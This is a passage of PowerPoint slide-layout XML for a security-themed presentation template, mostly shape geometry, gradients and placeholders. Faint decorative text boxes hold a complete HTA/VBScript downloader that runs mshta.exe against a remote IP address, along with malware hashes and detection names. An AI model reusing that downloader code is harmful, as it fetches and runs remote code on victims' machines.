                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69981505-D3DA-5160-7E94-4195B44B7B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10678200" y="-486807"/>
            <a:ext cx="20014372" cy="15151006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5937728 w 6691457"/>
              <a:gd name="connsiteY0" fmla="*/ 2573648 h 5065475"/>
              <a:gd name="connsiteX1" fmla="*/ 6039311 w 6691457"/>
              <a:gd name="connsiteY1" fmla="*/ 2514974 h 5065475"/>
              <a:gd name="connsiteX2" fmla="*/ 6656049 w 6691457"/>
              <a:gd name="connsiteY2" fmla="*/ 1791550 h 5065475"/>
              <a:gd name="connsiteX3" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY3" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX4" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY4" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX5" fmla="*/ 6656239 w 6691457"/>
              <a:gd name="connsiteY5" fmla="*/ 1790788 h 5065475"/>
              <a:gd name="connsiteX6" fmla="*/ 6483728 w 6691457"/>
              <a:gd name="connsiteY6" fmla="*/ 855719 h 5065475"/>
              <a:gd name="connsiteX7" fmla="*/ 6425082 w 6691457"/>
              <a:gd name="connsiteY7" fmla="*/ 754087 h 5065475"/>
              <a:gd name="connsiteX8" fmla="*/ 6366436 w 6691457"/>
              <a:gd name="connsiteY8" fmla="*/ 652455 h 5065475"/>
              <a:gd name="connsiteX9" fmla="*/ 5643355 w 6691457"/>
              <a:gd name="connsiteY9" fmla="*/ 35426 h 5065475"/>
              <a:gd name="connsiteX10" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY10" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX11" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY11" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX12" fmla="*/ 5642593 w 6691457"/>
              <a:gd name="connsiteY12" fmla="*/ 35235 h 5065475"/>
              <a:gd name="connsiteX13" fmla="*/ 4707967 w 6691457"/>
              <a:gd name="connsiteY13" fmla="*/ 207828 h 5065475"/>
              <a:gd name="connsiteX14" fmla="*/ 4606384 w 6691457"/>
              <a:gd name="connsiteY14" fmla="*/ 266502 h 5065475"/>
              <a:gd name="connsiteX15" fmla="*/ 753729 w 6691457"/>
              <a:gd name="connsiteY15" fmla="*/ 2491828 h 5065475"/>
              <a:gd name="connsiteX16" fmla="*/ 652146 w 6691457"/>
              <a:gd name="connsiteY16" fmla="*/ 2550502 h 5065475"/>
              <a:gd name="connsiteX17" fmla="*/ 35409 w 6691457"/>
              <a:gd name="connsiteY17" fmla="*/ 3273926 h 5065475"/>
              <a:gd name="connsiteX18" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY18" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX19" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY19" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX20" fmla="*/ 35218 w 6691457"/>
              <a:gd name="connsiteY20" fmla="*/ 3274688 h 5065475"/>
              <a:gd name="connsiteX21" fmla="*/ 207730 w 6691457"/>
              <a:gd name="connsiteY21" fmla="*/ 4209757 h 5065475"/>
              <a:gd name="connsiteX22" fmla="*/ 266376 w 6691457"/>
              <a:gd name="connsiteY22" fmla="*/ 4311389 h 5065475"/>
              <a:gd name="connsiteX23" fmla="*/ 325022 w 6691457"/>
              <a:gd name="connsiteY23" fmla="*/ 4413021 h 5065475"/>
              <a:gd name="connsiteX24" fmla="*/ 1048103 w 6691457"/>
              <a:gd name="connsiteY24" fmla="*/ 5030050 h 5065475"/>
              <a:gd name="connsiteX25" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY25" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX26" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY26" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX27" fmla="*/ 1048864 w 6691457"/>
              <a:gd name="connsiteY27" fmla="*/ 5030240 h 5065475"/>
              <a:gd name="connsiteX28" fmla="*/ 1983490 w 6691457"/>
              <a:gd name="connsiteY28" fmla="*/ 4857648 h 5065475"/>
              <a:gd name="connsiteX29" fmla="*/ 2085074 w 6691457"/>
              <a:gd name="connsiteY29" fmla="*/ 4798974 h 5065475"/>
              <a:gd name="connsiteX30" fmla="*/ 5937633 w 6691457"/>
              <a:gd name="connsiteY30" fmla="*/ 2573648 h 5065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691457" h="5065475">
                <a:moveTo>
                  <a:pt x="5937728" y="2573648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6039311" y="2514974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6288463" y="2366669"/>
                  <a:pt x="6555893" y="2165406"/>
                  <a:pt x="6656049" y="1791550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6656049" y="1791455"/>
                  <a:pt x="6656049" y="1791264"/>
                  <a:pt x="6656144" y="1791169"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6656144" y="1791169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6656144" y="1791169"/>
                  <a:pt x="6656144" y="1790883"/>
                  <a:pt x="6656239" y="1790788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6756394" y="1416836"/>
                  <a:pt x="6625298" y="1108798"/>
                  <a:pt x="6483728" y="855719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6425082" y="754087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6425082" y="754087"/>
                  <a:pt x="6366436" y="652455"/>
                  <a:pt x="6366436" y="652455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6218202" y="403186"/>
                  <a:pt x="6017034" y="135629"/>
                  <a:pt x="5643355" y="35426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5643259" y="35426"/>
                  <a:pt x="5643069" y="35426"/>
                  <a:pt x="5642974" y="35330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5642974" y="35330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5642974" y="35330"/>
                  <a:pt x="5642688" y="35330"/>
                  <a:pt x="5642593" y="35235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5268819" y="-64968"/>
                  <a:pt x="4960927" y="66191"/>
                  <a:pt x="4707967" y="207828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4606384" y="266502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753729" y="2491828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652146" y="2550502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="402995" y="2698806"/>
                  <a:pt x="135564" y="2900070"/>
                  <a:pt x="35409" y="3273926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35409" y="3274021"/>
                  <a:pt x="35409" y="3274212"/>
                  <a:pt x="35314" y="3274307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35314" y="3274307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35314" y="3274307"/>
                  <a:pt x="35314" y="3274592"/>
                  <a:pt x="35218" y="3274688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-64937" y="3648639"/>
                  <a:pt x="66160" y="3956678"/>
                  <a:pt x="207730" y="4209757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207730" y="4209757"/>
                  <a:pt x="266376" y="4311389"/>
                  <a:pt x="266376" y="4311389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="325022" y="4413021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="473256" y="4662290"/>
                  <a:pt x="674424" y="4929847"/>
                  <a:pt x="1048103" y="5030050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1048198" y="5030050"/>
                  <a:pt x="1048388" y="5030050"/>
                  <a:pt x="1048483" y="5030145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048483" y="5030145"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048483" y="5030145"/>
                  <a:pt x="1048769" y="5030145"/>
                  <a:pt x="1048864" y="5030240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422638" y="5130444"/>
                  <a:pt x="1730531" y="4999284"/>
                  <a:pt x="1983490" y="4857648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2085074" y="4798974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937633" y="2573648"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="19000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="76000">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="87CFD3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="1168400">
              <a:schemeClr val="accent1">
                <a:alpha val="7000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="1270000" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:alpha val="54000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="3600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626E58E5-B601-44FB-3D7C-F245FE85A47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205646" y="1229464"/>
            <a:ext cx="3120056" cy="61863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 userDrawn="1">
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4079729"/>
            <a:ext cx="10291356" cy="2409250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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1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Some Presentation Title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK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F281B37-560D-B024-7CBE-EBD57B2B706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95401" y="8697179"/>
            <a:ext cx="2325914" cy="31012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C7B6643-1C57-ED0A-611C-75B0B7F226AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873198" y="7308130"/>
            <a:ext cx="0" cy="934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F66938-53DC-8D7B-D503-D3D0EF32B57B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301198" y="7287022"/>
            <a:ext cx="0" cy="934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objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D17703-EAA9-8869-D5FD-A65ABD6865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98392" y="7323860"/>
            <a:ext cx="4087760" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A625C5B5-E765-3E91-E05A-05DA10FB33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98392" y="7730371"/>
            <a:ext cx="4087760" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5793E246-AF77-A1CD-64D0-24192E68C3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2280" y="7323860"/>
            <a:ext cx="4087760" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A45A6166-C559-CAD3-9A8C-EC704312E5D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2280" y="7730371"/>
            <a:ext cx="4087760" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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636573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0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- icons turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CDD9CF-99EA-93F8-0488-62825A416283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/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3793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53793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2399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92399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6" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63684CCA-0B09-1D6C-49CA-47679739B95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890734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7" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6EE22C-AD67-9662-BC20-E716D60E94D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115300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763FF8ED-FC0A-7A72-712A-C572551F7C3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301268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rgbClr val="F4F5F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10576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de - 2">
    <p:bg bwMode="ltGray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Rectangle 687">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E49B2F8D-289C-712F-4D14-56E33F7792AD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4278" name="Rectangle 4277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C8B3533-C028-80EF-C5AD-95C0AEB80AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="13935422" y="746966"/>
            <a:ext cx="3985032" cy="1246484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="39000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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1E851A9-3179-9BAE-E277-F9457FF5C91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="14946127" y="8844642"/>
            <a:ext cx="5060950" cy="162660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="39000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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689" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C85C96-9889-D2C3-0F17-02489DDCBB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-11847238" y="-24090858"/>
            <a:ext cx="35440872" cy="35440872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69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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4233" name="Group 4232">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C9CA68-31DA-4929-A267-3E3569BA1415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9348493" y="7275719"/>
            <a:ext cx="2333414" cy="307778"/>
            <a:chOff x="7073680" y="1395747"/>
            <a:chExt cx="1452583" cy="191595"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4236" name="TextBox 4235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D1983F-1DBB-6FEE-B6B1-51D68261C282}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7073680" y="1395747"/>
              <a:ext cx="48300" cy="957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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4237" name="TextBox 4236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368F2E6F-6E11-4BC1-3C47-B2E84AC0B2F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7194083" y="1395748"/>
              <a:ext cx="1332180" cy="19159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00" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>IOCTL_DISK_SET_DRIVE_LAYOUT_EX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89F02B8-BDB0-4B7E-6B5E-0CFC8A494A37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13946651" y="243822"/>
            <a:ext cx="3973806" cy="2418002"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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&lt;!DOCTYPE html&gt;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&lt;html&gt;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&lt;head&gt;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&lt;HTA:APPLICATION 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icon="#" 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WINDOWSTATE="minimize" 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SHOWINTASKBAR="no" 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SYSMENU="no" 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CAPTION="no" /&gt;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&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>vbscript</a:t>
            </a:r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"&gt;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On Error Resume Next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Set registered = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r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")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On Error Resume Next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87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>registered.Run</a:t>
            </a:r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"%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>windir</a:t>
            </a:r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%\system32\mshta.exe http://81.200.156.77/send/regular/02.03/rejoined.jpeg"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On Error Resume Next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    Close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    &lt;/script&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4290" name="TextBox 4289">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11A622BC-51EE-1C7D-B9D1-69951A912AD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695474" y="9302896"/>
            <a:ext cx="7394700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E815A879F7F30FB492D4043F0F8C67584B869F32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scam.php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PHP/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HackTool.Telekopye.B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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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378699D285325E905375AF33FDEB3276D479A0E2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scam.php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PHP/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HackTool.Telekopye.B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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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242CE4AF01E24DB054077BCE3C86494D0284B781 	123.php 	PHP/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HackTool.Telekopye.A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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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9D1EE6043A8B6D81C328C3B84C94D7DCB8611262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mell.php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PHP/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HackTool.Telekopye.B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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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B0189F20983A891D0B9BEA2F77B64CC5A15E364B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neddoss.php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PHP/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HackTool.Telekopye.A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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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E39A30AD22C327BBBD2B02D73B1BC8CDD3E999EA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nscode.php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PHP/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HackTool.Telekopye.A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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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285E0573EF667C6FB7AEB1608BA1AF9E2C86B452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tinkoff.php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PHP/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HackTool.Telekopye.A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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Telekopye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> bot. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4252" name="Group 4251">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E15DF83-D99F-EFDE-A061-ECFF74587B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15304870" y="1370203"/>
            <a:ext cx="3303424" cy="277001"/>
            <a:chOff x="6945493" y="1520993"/>
            <a:chExt cx="2056428" cy="172437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4255" name="TextBox 4254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9C5F1B-CB42-8684-431A-8F824CDB23C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7073680" y="1520994"/>
              <a:ext cx="48300" cy="172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600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4256" name="TextBox 4255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1AD9272-4C83-554E-52B6-8D20D8A53F19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7194082" y="1520993"/>
              <a:ext cx="1807839" cy="172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600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> disable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>FD9C17C35A68FC505235E20C6E50C622AED8DEA0</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>9CE1491CE69809F92AE1FE8D4C0783BD1D11FBE7</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4261" name="Rectangle 4260">
              <a:extLst>
